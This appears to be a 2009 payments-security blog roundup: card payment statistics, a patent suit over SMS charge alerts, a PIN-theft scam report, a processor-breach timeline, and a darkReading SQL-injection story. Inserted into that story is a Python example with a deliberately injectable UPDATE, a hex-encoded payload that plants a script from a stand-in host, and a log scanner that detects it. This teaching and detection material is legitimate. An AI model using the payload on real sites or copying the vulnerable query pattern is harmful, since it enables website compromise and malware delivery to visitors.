The predominance of credit cards as the most important payment method in retailing is even more visible among consumers from the UK and outside Europe than among German customers. Traditional payment methods such as invoice purchasing or direct debiting are almost non-existent for this consumer group. UK consumers use their credit cards even more often in retailing than in overall e-commerce. The share in overall e-commerce is already very high, at 91.50%, and it rises to 94.90% in retailing. Maestro, the leading international debit payment method, which is gaining ground in e-commerce in comparison to credit cards, is the only other payment method which seems acceptable to British consumers, with a share of 5.10%. Shops which also target customers outside Europe do well to offer credit card payment, which has a share of almost 100% among these consumers.

Upward potential for new payment methods Maestro and giropay in European retailing

In general, retail consumers are still reluctant to adopt newer payment methods such as Maestro and giropay (which is based on the well-established PIN/TAN electronic banking method) - at least more reluctant than e-commerce customers as a whole. giropay meets with even less approval than Maestro. Maestro has a share of 0.77%, but giropay undershoots even this low mark with a share of only 0.65%. This is probably due to the fact that, using this new payment method, it is still difficult to process retail goods returns and the crediting procedure for returned purchases is complicated.

Visa increases its lead over MasterCard as top credit card brand

Visa, which is the leading credit card brand in overall e-commerce, was able to confirm and even improve its leadership position in retailing, too. While the gap between Visa and MasterCard was just above 19pp in the preceding year, it is now more than 25pp. Visa has increased its lead again at the expense of the other credit card brands, whose share dropped from 7.35% to 5.48%. In the meantime Visa has overtaken its rival MasterCard in retailing with German consumers, too: While MasterCard was ahead of Visa in the preceding year with a share of 41.69% (vs 33.95%), Visa is now in front of MasterCard (44.40% vs 35.40%). In other consumer countries such as the UK, where the lead is an impressive 36.20 pp, Visa is even more predominant than in Germany.

Source: Press Release


Visa in one Helluva SMS

HOLLYWOOD, Fla., Feb. 26 /PRNewswire/ --

Charge Notification Services Corporation (C.N.S.C.) has filed a lawsuit against VISA, Inc. for patent infringement. C.N.S.C. is a relatively young company in Miami, Florida, that offers information processing services to credit card issuing banks. The C.N.S.C. patent covers charge card transaction authorization and/or notification in real-time via SMS to the cardholder's cellular phone. VISA and some of their bank partners have recently been offering this service.

"We are very sorry that it had to come to filing this suit," says Ivan Ochoa, the C.E.O. of C.N.S.C. "For months we've tried exhaustively to work with VISA with no results. We're a young company but we have experience with this product and the credit card business as a whole. We have the knowledge and infrastructure to handle even the most extreme transaction volume. We've expended considerable resources on patent registration and product development."

Editor's note:  Apparently Visa didn't get the SMSage

Daniel Davila, COO of C.N.S.C., adds: "In these economically troubled times people want to use their cards (debit, pre-paid, credit card and charge) and receive real-time information about charges to their account. If cardholders have to wait until they receive their statement to discover possible merchant errors or duplications, it's already too late to avoid the complex and time-consuming process of 'charge-back' that costs cardholders and businesses time, resources and aggravation. Of course what cardholders want most of all is to be confident that their card account will not be used fraudulently. All indicators show that card fraud activity is expected to increase even further. We have the line of products that will significantly decrease card fraud and give confidence to all cardholders that in the event their card or account information is ever stolen and used fraudulently our SMS service will send them notification within a matter of seconds from the moment it occurs. We are in the business of stopping the fraudsters and providing tremendous savings and other benefits to our card issuing clients. As VISA continues to infringe on our patent, we really must take this legal action against them to protect our business. In the meantime, of course, we continue to actively offer our services to all card issuing financial institutions."

Ochoa and Davila have a combined five decades of experience in the financial services industry. Mr. Davila's background includes 16 years at American Express where he was a Senior Director within the Global Network Services (GNS/Franchise) division and more recently, two years as Vice President and Chief Risk Officer of the credit card division at Russian Standard Bank (RSB) in Moscow. While at RSB, Mr. Davila launched a similar SMS credit card fraud protection service with great success, resulting in an overall significant reduction of fraudulent transactions. Mr. Ochoa's 25 years in the financial services industry include executive positions within American Express and MasterCard International, where he was Chief of Staff for Latin American countries. His areas of expertise include managing operations for multi-markets, re-engineering, quality control and technology. Mr. Ochoa has led major innovative developments in products and systems.
SOURCE Charge Notification Services Corporation

Thursday, February 26, 2009

Jewel Thieves

How To Steal a PIN

Chicago Sun Times

Two women police say were accomplices in a scam were arrested early Wednesday for allegedly stealing cash using a debit card PIN number in the self-checkout lines of a Near North Side Jewel grocery.

Belmont Area detectives issued a community alert Wednesday after a man met two women outside a River North bar last month and later discovered his bank debit card was missing and $8,600 was withdrawn from his account.

Neither of the women in custody, both 23, are believed to have been involved in the other incident.

The accomplices were spotted using an allegedly stolen credit card in the self-checkout lanes and, using its PIN number, swiped it several times, each time asking for $100 cash back on a small purchase like gum or soda.

In the alert, Belmont Area detectives said there have been numerous similar incidents downtown and on the Near North Side, where men have been approached by women "offering a ride or a good time."

The women convince the victims to withdraw cash from an ATM, and as he does so, they watch him enter his PIN. The women later take his credit/debit card without his knowledge and use it at self-checkout lanes at the Jewel groceries at 1224 S. Wabash Ave., 1210 N. Clark St. and Ohio and State.

In last month's incident, after the women got the man's card, they purchased a low-priced item at the South Wabash Jewel then depleted the man's bank account by $8,600 by withdrawing cash in $100 increments, the alert said. The women were seen by a witness driving away in a white Lincoln Continental.

Police advise men to be alert to suspicious people extending invitations to "go for a ride" or who offer a "good time." Additionally, police advise against carrying an excessive amount of cash and/or credit cards.

“It’s the perfect crime,” according to a police authority, who said the crimes are hard to prosecute for at least two reasons.

The victims often don’t want to come forward because they don’t want their names used, especially if they are married, and the amounts are sometimes not significant enough for the bank to aggressively seek action.


United - No Cash..."Card Info"

In a Press Release from United Airlines, they announced No Cash...Visa!  So your Martinis, Dewars, Maker's Mark and other in-flight purchases can no longer be paid for with CASH.

If the reasoning behind this is that they don't want their stewards to pocket cash, then they apparently are not aware of the potential danger this poses for their customers.   Hopefully people will be able to swipe their cards from their seat, because it is highly inadvisable to hand over your card (and thus the Track 2 data on the magnetic stripe) to a waitress at a restaurant, let alone a waitress in the sky.  The opportunity, and thus the temptation, to "skim" the card information might be too great for some, and the passenger can be taken for a ride.


No Cash...Card

United Airlines introduces onboard credit/debit card acceptance beginning March 23

CHICAGO, Feb. 25 /PRNewswire-FirstCall/ -- United Airlines is making the search for exact change a thing of the past. With United's new EasyPurchase, customers will be able to use credit and debit cards for onboard purchases beginning March 23.

After a brief transition period through the spring break season, United will phase out cash and only accept credit and debit cards on flights within the United States (including Hawaii) and on flights to and from Canada, Mexico, Central America and the Caribbean.

United will continue to accept cash in addition to credit and debit cards on flights to and from Europe, Asia, the Middle East and South America.

On United Express flights, cash will continue to be the accepted form of payment.

"Our customers have responded very positively over the past year as we tested credit and debit card purchases on many flights including trans-continental routes," says Alex Marren, senior vice president - Onboard Service. "Whether customers want to enjoy an in-flight cocktail or a popular snackbox, our customers' purchases will soon be just a quick swipe away."

With EasyPurchase, customers will be able to use major credit cards, including Visa, MasterCard, American Express, Discover, and Diners Club, and debit cards bearing the Visa or MasterCard logos.

In addition, users of United Mileage Plus Visa cards from Chase will earn 10 miles for every dollar spent on in-flight purchases. Travelers who apply and are approved for a Chase Mileage Plus Visa card using the exclusive onboard application will earn 30,000 Mileage Plus bonus miles and receive $25 off their next United Airlines ticket, after their first purchase.

About United

United Airlines (Nasdaq: UAUA) operates more than 3,000* flights a day on United and United Express to more than 200 U.S. domestic and international destinations from its hubs in Los Angeles, San Francisco, Denver, Chicago and Washington, D.C. With key global air rights in the Asia-Pacific region, Europe and Latin America, United is one of the largest international carriers based in the United States. United also is a founding member of Star Alliance, which provides connections for our customers to 912 destinations in 159 countries worldwide. United's 49,500 employees reside in every U.S. state and in many countries around the world. News releases and other information about United can be found at the company's Web site at

*Based on United's flight schedule between Jan. 1, 2009, and Jan. 1, 2010.

SOURCE United Airlines


Mystery Processor's Breach Timeline has released a comprehensive time-line on the Mystery Breach at one of our nation's prominent card processors.  Since the PIN Payments Blog has been following this closely,  we thought we'd share.  Kudos to for putting this together in a clear and concise way...

2009-02-26 by d2d

Here's a timeline of what we've seen surrounding this vaguely disclosed breach. First, some terms:

CAMS: This is an acronym for a Visa implemented system, the "Compromised Account Management System". Alerts are distributed via this system to banks and other financial institutions to facilitate card reissuing and fraud detection. Mastercard also issues similar alerts.

Card Not Present: This term means exactly what you think it does. The card was not physically present during the transaction. This is typical in online shopping, telephone sales, etc.

UPDATE | February 11th, 2009: VISA blasts out a CAMS notice, which has been contributed to OSF anonymously:

"Date: February 11, 2009
Entity Type: Acquirer Processor
Fraud Reported: Yes, elevated fraud rates on this event

Visa Fraud Control & Investigations has been notified of a confirmed network intrusion that may have put Visa account numbers at risk. The reported incident involves confirmed unauthorized access to a U.S. acquirer processor's settlement system of stored transaction information that included Primary Account Numbers (PANs) and expiration dates. No magnetic stripe track data has been identified at risk in this alert. Fraud analysis has revealed elevated card-not-present fraud rates on this incident. Even though it is not known if any account information was actually removed during the intrusion, we must still consider the data to be at risk because of the elevated fraud. Based on the forensic investigative findings, the entity began storing PANs and expiration dates in February 2008. The forensic investigation is ongoing. Any new material information will be provided in a CAMS update to better assist you with fraud and risk mitigation."

February 11th, 2009: Fiserv blasted out this alert to their customers (banks, credit unions, processors, etc). We were tipped on this by multiple sources. The statement reads:

"The Risk Office Team has received information from Visa and MasterCard regarding the confirmed compromise of a U.S.-based acquirer processor. Please note that the compromised card alerts for this event are not related to the Heartland Data Systems’ breach. Given that confirmation of the Heartland breach and this new compromise occurred in such close proximity, it’s possible that the same card numbers could appear on compromised card lists associated for both events. You may wish to take this into consideration as you execute your organization’s monitoring and/or reissue plans for recently compromised cards."

February 12th, 2009: The Community Bankers Association of Illinois posts a notice that included the following:

"Today, VISA announced that an unnamed processor recently reported that it had discovered a data breach. The processor’s name has been withheld pending completion of the forensic investigation..."

Between 2-11 and 2-13: The Tuscaloosa Federal Credit Union releases a notice regarding the incident that reads:

"On the heels of the Heartland Payment Systems breach, another U.S. acquirer-processor has confirmed a network intrusion exposing primary card numbers and card expiration dates for card-not-present (CNP) transactions. Unlike the Heartland Payment breach, this breach does not expose magnetic stripe track data. The reported incident involves confirmed unauthorized access to a U.S. acquirer processor’s settlement system of stored transaction information that included Primary Account Numbers (PANs) and expiration dates. As the entity involved has not yet issued a press release, Visa and MasterCard are unable to release the name of the merchant processor. It is important to note that this event is not related to the Heartland Payment Systems breach."

February 13th, 2009: The Independent Community Bankers of America releases this on their website:

"ICBA learned of another security breach involving a merchant processor. The breach appears to be large, but not as large or severe as the recent breach at Heartland Payment Systems. The name of the breached processor is unknown at this time, but ICBA knows that: All accounts and all brands were equally exposed; however, only card numbers and expiration dates were captured. No track data was captured. Because there is no evidence of skimming counterfeit and all known fraudulent transactions have been key entered, Visa's ADCR program will not cover losses. However, compliance and “card not present” (depending on status of VbyV/SecureCode) chargeback rights should apply. MC issuers must file via compliance as they always do. Alerts for this new incident are being reported under Visa series US-2009-088 and MasterCard series MCA0150-US-09."

February 13th, 2009: The Pennsylvania Credit Union Association released this statement which we've retrieved from google cache, as the content of the old notice is now displaying a new notice about something else. The old notice read:

"Earlier this week, Visa and MasterCard began issuing accounts involved in a merchant processor breach. The reported incident involves confirmed unauthorized access to a U.S. acquirer processor's settlement system of stored transaction information that included Primary Account Numbers (PANs) and expiration dates. No magnetic stripe track data has been identified at risk in this alert. As the entity involved has not yet issued a press release, Visa and MasterCard are unable to release the name of the merchant processor. It is important to note that this event is not related to the Heartland Payment Systems breach. While it has been confirmed that malicious software was placed on the processor's platform, there is no forensic evidence that accounts were viewed or taken by the hackers. Since the final forensic report has not been provided there is no estimate available at this time of the number of accounts involved in this event. Law enforcement is actively engaged in an investigation into this situation. Visa began releasing affected accounts on Monday, February 9, 2009 under CAMS event series US-2009-0088-IC. They expect to have all accounts released by Friday, February 13. MasterCard began releasing accounts on Wednesday, February 11, 2009 under MC Alert series MCA0150-US-09. They have not provided any information as to when they expect to have all their accounts released. The current window of exposure provided by both card associations is from February 2008 through January 2009. The only data elements at risk are account number and expiration date. No track data, PIN, CVV2/CVC2 data or cardholder-identifying information was captured. As in all events, it is the issuer's decision whether or not a block and/or reissue decision is warranted. However, we would like to emphasize that this event carries a lower level of risk than the Heartland compromise."

February 13th, 2009: We posted a blog entry regarding what we've been hearing from tipsters, who are usually dead on about these things, but we did so only after corroborating that the tips we'd heard were also being heard by others.

February 17th, 2009: The Alabama Credit Union posts a notice on their website that reads:

"Alabama Credit Union has been notified by VISA that some members' VISA credit card information may have been discovered during a breach at a card processor's site. VISA has not named the card processor."

February 17th, 2009: The Bankers' Bank of Kansas posts a notification which reads:

" Two large data compromises affecting credit and debit cards were announced the weeks of 1/21/09 and 2/09/09. BBOK BankCard actively monitors all alerts from Visa®, MasterCard®, and our processor for compromised card data...."

February 19th, 2009: The Alabama Credit Union follows up on their initial reporting with an update indicating how fraud is being committed as a result of this new breach, and it contains the following:

We have been notified by VISA that a lengthy list of VISA ATM/Debit Card numbers was included as part of a data breach at an unknown vendor's location. VISA has declined to name the vendor or processor. The fraudulent transactions are primarily characterized as purchases of prepaid phone cards, prepaid gift cards, and money orders from Wal-Mart, and usually occur in $100 increments.

February 22nd, 2009: We posted a follow-up to our original story, with new information (some of the above timeline items) gathered from

February 24th, 2009: News reports are released about St. Mary's Credit Union receiving notification regarding this breach. The article writes:

"A breach of a credit card processing system at St. Mary's Credit Union yesterday affected up to 4,300 customers and likely cost the business more than $20,000....The credit union does not know the name of the processing system, but Battista said the breach likely affected people across the country..."

End of Timeline

This is what we know. Of course, there is a lot of speculation as to who the unnamed processor is. Our mailboxes here are on fire with speculation, and you can read the comments on some of our previous posts on the topic to see examples of it. We have no solid information regarding who the affected organization is. We do know that we've had two other major breaches recently involving this type of data, namely: RBS Worldpay and Heartland Payment Systems. We also know that in a statement to the Consumerist, Visa and Heartland are adamant that this new breach was not them.

Ultimately, I think the banks will demand to know, considering the costs are mostly their burden to bear. But in the meantime, we wait.


500,000 Websites Hit by SQL Injection in '08

darkReading says that SQL Injection hit 500,000 Websites last year:

Report: More Than 500,000 Websites Hit By New Form Of SQL Injection In '08
New Web breach incident report finds the bad guys deploying more automated attacks, targeting customers rather than data on sites

Feb 25, 2009 | 02:52 PM
By Kelly Jackson Higgins

A new flavor of an old-school Web attack was responsible for compromising more than 500,000 Websites last year.

An automated form of SQL injection using botnets emerged as the popular method of hacking Websites, according to a newly released report from the Web Hacking Incidents Database (WHID), an annual report by Breach Security and overseen by the Web Application Security Consortium (WASC). The report also found that attackers increasingly are targeting a Website's customers rather than the sensitive information in the site's database.

"It used to be that mostly e-commerce sites were targeted, but now it's potentially any site, especially those with a large customer base," says Ryan Barnett, director of application security research for Breach Security. "The attackers say, 'You're going to become a malware-launching point for us.'"

The so-called Mass SQL Injection Bot attacks basically automate the infection process; the Nihaorr1 and Asprox botnets both deployed this method last year, according to the report. "In the past, they had to do some manual reconnaissance with SQL injection to send the initial queries," Barnett says. The automated approach sent one request with a script that automated all of those recon steps -- using bots to perform the attacks.

"While the initial attack vector was SQL Injection, the overall attack more closely resembles a Cross-Site Scripting methodology as the end goal of the attack was to have malicious JavaScript execute within victims' browsers," the WHID report says. "The JavaScript calls up remote malicious code that attempts to exploit various known browser flaws to install Trojans and Keyloggers in order to steal login credentials to other web applications."
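The mechanism the report describes, as an added example that is not from the WHID report, Breach Security or darkReading: a Python script (names assumed, log lines constructed, an in-memory SQLite table standing in for the site database) that shows the string-built UPDATE which lets one request rewrite every page beside its parameterized fix, and a log scanner that flags the hex-encoded CAST/EXEC payload style of the 2008 bots and decodes it to pull out the script URL as an indicator to block.

```python
"""Added example: why one SQL-injection request can poison every page, and how
to spot the hex-encoded bot payloads in access logs. Sample data is constructed."""
import re
import sqlite3
from urllib.parse import quote, unquote_plus

# ---- 1. The query-building defect the bots exploited ------------------------
def _fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, body TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)",
                     [(1, "home"), (2, "about"), (3, "contact")])
    return conn

def update_body_vulnerable(conn, page_id, body):
    # Defect (kept on purpose): the id from the request is spliced into SQL text,
    # so "1 OR 1=1" widens the WHERE clause to every row.
    conn.execute(f"UPDATE pages SET body='{body}' WHERE id={page_id}")

def update_body_safe(conn, page_id, body):
    # Fix: bound parameters; the driver treats the id as data, never as syntax.
    conn.execute("UPDATE pages SET body=? WHERE id=?", (body, page_id))

def bodies(conn):
    return [row[0] for row in conn.execute("SELECT body FROM pages ORDER BY id")]

def demo(update_fn):
    """Apply one update with a hostile id (constructed) and return every page body."""
    conn = _fresh_db()
    update_fn(conn, "1 OR 1=1", "x")
    return bodies(conn)
# demo(update_body_vulnerable) -> ['x', 'x', 'x']            (every page rewritten)
# demo(update_body_safe)       -> ['home', 'about', 'contact'] (the text matches no id)

# ---- 2. Detection: hex-encoded CAST/EXEC payloads in access logs ------------
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# The 2008 bots hid their SQL as a hex literal: CAST(0x... AS [N]VARCHAR(4000)).
HEX_CAST = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?)(?:VAR)?CHAR", re.I)
SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc=['\"]?([^'\" >]+)", re.I)

def decode_hex_literal(hexdigits, is_unicode):
    raw = bytes.fromhex(hexdigits)
    # NVARCHAR literals are UTF-16LE on SQL Server; VARCHAR is single-byte.
    return raw.decode("utf-16-le" if is_unicode else "latin-1", errors="replace")

def analyze_line(line):
    """Return a finding dict for an injection attempt, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = unquote_plus(m.group("path"))          # undo %xx and '+' encoding
    hit = HEX_CAST.search(query)
    if not hit:
        return None
    decoded = decode_hex_literal(hit.group(1), bool(hit.group(2)))
    src = SCRIPT_SRC.search(decoded)
    return {"ip": m.group("ip"), "time": m.group("ts"),
            "path": m.group("path").split("?", 1)[0],
            "status": int(m.group("status")),
            "decoded_sql": decoded,                        # what the bot tried to run
            "script_src": src.group(1) if src else None}   # IoC to block and hunt for

def scan(lines):
    return [f for f in map(analyze_line, lines) if f]

# Constructed sample log (documentation IPs and an .invalid host, nothing real).
_INJECTED_SQL = "UPDATE t SET c=c+'<script src=http://bad.example.invalid/b.js></script>'"
_PAYLOAD = (";DECLARE @S VARCHAR(4000);SET @S=CAST(0x"
            + _INJECTED_SQL.encode("ascii").hex().upper()
            + " AS VARCHAR(4000));EXEC(@S);")
SAMPLE_LOG = [
    '198.51.100.7 - - [12/May/2008:03:14:01 +0000] "GET /products.asp?id=42 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [12/May/2008:03:14:07 +0000] "GET /products.asp?id=42'
    + quote(_PAYLOAD, safe="") + ' HTTP/1.1" 200 5120',
    '198.51.100.9 - - [12/May/2008:03:14:09 +0000] "GET /about.asp HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    print(demo(update_body_vulnerable), demo(update_body_safe))
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["path"], "->", f["script_src"])
```

The scanner is deliberately narrow: it only matches the hex-literal CAST form, because that encoding is what let the bots send a single opaque request instead of the manual probing Barnett describes, and a 200 status on such a request is the signal worth paging on. Parameterized queries close the hole itself; HTML-escaping database content on output is the second layer that keeps an already-poisoned row from running in visitors' browsers.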

Continue "darkReading"

